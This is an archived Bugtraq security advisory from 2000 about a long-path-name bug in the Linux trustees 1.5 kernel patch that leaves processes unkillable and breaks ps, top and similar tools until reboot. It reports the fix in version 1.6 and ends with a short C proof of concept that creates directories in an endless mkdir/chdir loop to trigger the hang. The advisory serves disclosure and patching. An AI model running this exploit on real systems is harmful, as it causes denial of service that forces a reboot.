4991946 2000-04-10  21:35  /65 rader/ Postmaster
Mottagare: Bugtraq (import) <10445>
Ärende: linux trustees 1.5 long path name vulnerability
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <20000410142058.W19474@univ.uniyar.ac.ru>
Date:         Mon, 10 Apr 2000 14:20:59 +0400
Reply-To: "Andrey E. Lerman" <lae@UNIYAR.AC.RU>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Andrey E. Lerman" <lae@UNIYAR.AC.RU>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

Linux trustees is a kernel patch which provide Netware-like
permissions to linux. It is not in kernel by default.

For more information see project's website at
http://www.braysystems.com/linux/trustees.html

Problem description:
When accessing a file or directory with a very long path the
process hangs in an unkillable state. All other processes are
SEGFAULTing when trying to access unkillable process' /proc
entry. So system utilities ps, w, top, killall and the like are
stoppping working. Except that, the system continues to
function normally. The only solution is reboot.

The only version tested is trustees 1.5 for linux 2.2.14. But
it seems what other versions of linux trustees <1.6 are vulnerable.

I'm not sure if this vulnerability is only local DoS. It may
be possible to overwrite the process' structures in the
kernel, causing privileges elevation. I haven't investigated
that possibility yet, so I may be wrong. Servers with open ftp
incoming directory, nfs or samba shares are at risk too.

Status:
This problem is fixed in linux trustees 1.6, available for
linux 2.2.14 and 2.3.99. Thanks to the author of the package,
Vyacheslav Zavadsky for a quick response.

Exploit:
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>

int main(void)
{

while(1) {
	if(mkdir("aaaa",0777)<0) {
		perror("mkdir");
		exit(1);
		}
	if(chdir("aaaa")<0) {
		perror("chdir");
		exit(1);
		}
	}

return(0);
}
-- END --
(4991946) ------------------------------------------